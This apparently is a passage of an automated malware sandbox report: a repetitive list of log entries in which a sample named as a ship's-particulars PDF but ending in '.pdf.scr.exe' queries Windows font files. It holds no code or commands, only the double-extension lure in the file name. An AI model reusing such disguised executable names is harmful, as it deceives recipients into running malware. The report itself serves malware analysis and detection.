Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
